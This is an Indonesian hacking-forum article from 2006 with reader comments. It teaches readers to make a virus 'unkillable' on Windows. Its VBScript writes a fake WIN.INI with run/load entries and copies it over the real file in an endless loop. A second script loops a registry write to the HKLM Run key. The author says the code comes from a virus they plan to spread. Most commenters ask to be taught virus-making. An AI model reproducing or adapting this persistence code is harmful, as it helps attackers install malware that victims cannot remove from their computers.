Home
Hacking
Tutorial
.NET
IT News
Lain-lain
About Us
FAQ
Penerbitan Buku

Klik untuk join milist Jasakom




 

Jasakom Community - Article
MANIPULASI FILE WIN.INI
Date: Sunday, January 01, 2006    Hits: 9633    By:  rename rename   

Masih ingat sama tulisan Sto di buku STH(Hack 1x19),tentang bagaimana menjalankan program secara remote pada komputer korban.Nah bagi para master virus juga pasti udah tau tentang manipulasi File WIN.INI yang terletak pada C:\WINDOWS\WIN.INI.

Selain manipulasi WIN.INI,bisa juga digunakan manipulasi File System.INI,atau manipulasi Registry(Regedit.Exe).Sebelumnya akan saya ceritakan tentang Virus yang pernah saya temukan pada komputer teman saya,ternyata virus itu melakukan manipulasi pada file WIN.INI,yaitu pada bagian Run untuk menjalankan program virus itu tiap kali komputer Starting.Ketika aku mencoba menghapus virusnya ternyata tidak bisa,kemudian aku membuka file WIN.INI dan menghapus bagian Run tadi,Setelah komputer aku Restart Virus yang tadi aku temukan dapat aku delete dengan mudah.Nah dari sini kita dapat memanfaatkan Do...Loop(baca tulisanku yang dulu “Anti Deletion File”),untuk membuat Virus yang kita buat jadi sakti(tereksekusi terus)didalam komputer korban.Gimana caranya?nah lihat script ini aja ntar aku jelasin satu persatu.bagian yang saya pikir kalian semua dah tau akan saya loncati Oke?

Dim syarah,sarah
‘menentukan variabel

Set syarah=createObject(“Scripting.FileSystemObject”)
‘mengeset nilai syarah

set sarah=syarah.CreateTextFile(“C:\WINDOWS\System.tegal”)
‘menciptakan file System dengan extensi tegal(nama dan extensi optional)

sarah.Writeline “[WINDOWS]”
sarah.Writeline “run=C:\Virusmu.vbs”
sarah.Writeline “Load=C:\Virusmu.vbs”
sarah.Writeline “[Intl]”
sarah.Writeline “ICountry=62”
sarah.Writeline “sCountry=Indonesia”
sarah.Writeline “sCurrency=Rp”
sarah.Writeline “sLanguage=Ind”
‘diatas adalah isi dari file System.Tegal

sarah.Close
‘aku pikir kalian pasti tau

Set suci=syarah.GetFile(“C:\WINDOWS\System.tegal”)
‘Memberi nilai pada variabel suci

Do
suci.Copy “C:\WINDOWS\WIN.INI”
‘mengkopikan System.Tegal ke direktori Windows dengan nama WIN.INI(inilah hebatnya VBS dia dapat ‘dikopikan dengan nama yang lain dan extensinya dapat dirubah)

Loop
‘ini fungsi Loop yang akan membuat WIN.INI palsu tidak bisa dihapus
sekaligus tidak bisa di edit

‘artinya meski anda berhasil menghapus bagian run-nya,tapi akan tercopy lagi seperti semula.

Sebenernya script diatas adalah bagian dari Virus yang mau aku sebarkan(harusnya masih rahasia nih),kurang apa aku ma Jasakom(cieileh ngrayu terus,biar dapet buku gratis dari Sto : P).Script diatas akan menciptakan File System.Tegal(Optional,bisa pake nama&Extensi apa aja yang penting bisa menipu)yang jelas Ciptakan file dengan extensi terserah anda dalam hal ini saya pake extensi .Tegal(karena ga ada program yang bisa baca Extensi .Tegal).Setelah itu Copykan file itu di Direktory Windows dengan nama WIN.INI(rubah extensinya)File WIN.INI sudah ada akan digantikan dengan File yang anda buat.Manipulasi ini dapat pula dilakukan pada Registry(Regedit.exe).Nih lihat contohnya aja biar jelas

Do
Set sarah=CreateObject(“Wscript.Shell”)
sarah.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Sarah”, ”C:\Virusmu.exe”
Loop

Nah dengan begitu meski anda dapat menghapus(Mengedit)Registry,dalam hal ini menghapus sarah dengan data “C:\Virusmu.exe” tapi setelah anda beranjak pergi akan terjadi penulisan disana lagi.Maka dari itulah jangan sekali-kali percaya dengan satu kali penghapusan,ceklah berulang kali file atau tempat-tempat yang dapat dimanipulasi oleh virus.oke sekian dulu tulisan sederhana dari kota Tegal damai.Sebelumnya saya mengucapkan maaf bila artikel semacam ini(atau mirip)sudah pernah ditulis(dimanapun),karena hanya pakai logika yang sederhana saya pikir banyak pula orang yang sudah tau(apalagi para master).Maaf sekali lagi saya hanya Newbie,jadi bila ada kesalahan mohon koreksi.Ini terkait pula dengan tulisanku”Anti deletion File”di Jasakom,ada yang kasih komentar kalau tulisan semacam itu pernah ditulis di IT centernya Unpad,saya mohon maaf sekali lagi kepada IT Center Unpad,karena saya benar-benar tidak menyontek tulisan anda(karena saya sendiri ga tau tentang IT center nya Unpad) dan saya benar-benar menemukan logikanya sendiri,Jadi sekali lagi saya mohon maaf yang sebesar-besarnya bila ada kesamaan informasi dari tulisan saya.

Greetz

1.My Family
2.My Honey Syarah
3.Tomero&divk0p1m1x(thank's koreksinya)
4.Temen semua

Source: JASAKOM Information Center
 
1 2 3
Jasakom Community - Visitor Comment
Nama: MIB   Tgl: 2/28/2006 8:29:17 AM
Komentar:
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
Nama: Dian Maulani   Tgl: 2/11/2006 3:04:53 AM
Komentar:
http://www.geocities.com/dian_maulani2006/UNDANGAN.txt
Nama: obezyanka   Tgl: 1/20/2006 4:38:18 AM
Komentar:
dear KK, virusnya ok juga..ada yg laen ga KK? Soalnya banyak yg lom dimengerti neh...!KIK3X
Nama: DarkMaverick   Tgl: 1/19/2006 11:58:58 PM
Komentar:
K'lo mo ngasih coding virus, jangan sepotong-potong. Nggak rame tau ...
Nama: malang   Tgl: 1/19/2006 10:38:29 AM
Komentar:
kalo bisa virus HIV biar gak bisa sembuh
Nama: malang   Tgl: 1/19/2006 10:36:15 AM
Komentar:
hiiiiiii sema.tolongin aku dong,ajarin cara mbuat virus
Nama: malang   Tgl: 1/19/2006 10:36:12 AM
Komentar:
hiiiiiii sema.tolongin aku dong,ajarin cara mbuat virus
Nama: senichi   Tgl: 1/18/2006 7:23:08 AM
Komentar:
tolong dong kirim2 k afihs_vai13@yahoo.com tentang hack n cara buat virus..kk rename n master2 lain ditunggu lg tulisannya..
Nama: senichi   Tgl: 1/18/2006 7:20:16 AM
Komentar:
alo smua,aku newbie bgt niy ttg kek ginian..tp kok ada yg ngajak tanding d battle.net sgala yah?wkwkwk..mw dong ikut..Btw tulisannya keren euy, cb saya ngerti pasti lebih keren n bisa dicoba..mang vbs tuh apaan siy? Kk kk, master2, n suhu2 tolong ajarin
Nama: rename   Tgl: 1/16/2006 7:24:17 AM
Komentar:
wah sebenernye masih banyak nyang blom aku ungkapin(msh rahasia lah yau).buat kangtatantakwa(just thank's),tomero(temenan yuk!).ayo sesama anak indonesia jangan pada bertengkar,mending dukung sama2 oke?
Nama: Jhibrock   Tgl: 1/11/2006 12:31:50 AM
Komentar:
dikasih formalin virusnya bisa ilang nggak??? Klo gwe coba ditempat PKL gwe boleh nggak??
Nama: JC-PHLEX   Tgl: 1/7/2006 8:34:43 AM
Komentar:
Download here =>> http://phlex.webpal.info <<=
Nama: J4mbi_H4ck3r   Tgl: 1/7/2006 7:46:26 AM
Komentar:
http://www.boogs.ph/download/jambihackerlink.txt
Nama: rajawali   Tgl: 1/7/2006 5:51:11 AM
Komentar:
thanks, perlu sedikit editing.
Nama: erick_shot   Tgl: 1/7/2006 12:01:21 AM
Komentar:
koq pada ngurusin brontox sehh??? donlot aja serumnya http://www.dinamikasolusi.co.nr ato di www.nrar.net/?Produk. Gratis
Nama: erick_shot   Tgl: 1/6/2006 11:57:45 PM
Komentar:
wooooowwwwwwwwwwwww.............. krenzzzzzzzzzzzzzzzzzzzzzzzzzz.......... bangett................. kalo diletakkan di /etc/rc.local bisa gak ??? trus kalo kena virus, apa linuxku harus di format ya ? ... ups........... ini tentang Microsuck WIndows ya
Nama: penjual_formalin   Tgl: 1/6/2006 6:16:51 PM
Komentar:
dijual formalin sbg bahan pengawet makanan anda, dapatkan segera di toko2 terdekat anda. STOCK TERBATAS!!!. Dijual dalam bentuk serbuk per kg
Nama: anonymous   Tgl: 1/6/2006 1:49:23 PM
Komentar:
saya mewaKili Id Ini MengUcaPkan seLamAt TahuN barU seMua beLom teLat kan sori shiiro
Nama: #AntiHiddenLine   Tgl: 1/6/2006 1:27:57 PM
Komentar:
walah telat koment saya ops userid sapa neh gw bajak sori -=shiiro=-
Nama: J4mbi_H4ck3r   Tgl: 1/6/2006 4:25:11 AM
Komentar:
Tutorial anti virus brontok -=> http://www.ibuhamil.com/new_design/forum/prahamil/index.php
1 2 3

 

© Copyright by Jasakom 2005 All Right Reserved

User Id: *

Password:
* Required Field
User Baru ? Klik di sini
Lupa Password ?
Keyword :
 

Click here to join jasakomdotnet
Klik di sini untuk Join jasakomdotnet




Informasi disini digunakan untuk tujuan pendidikan, Jasakom tidak bertanggung jawab untuk penyalahgunaan informasi yang ada pada web ini. Gunakan segala bentuk informasi disini secara bijak untuk melindungi diri anda sendiri agar  tidak  menjadi korban internet.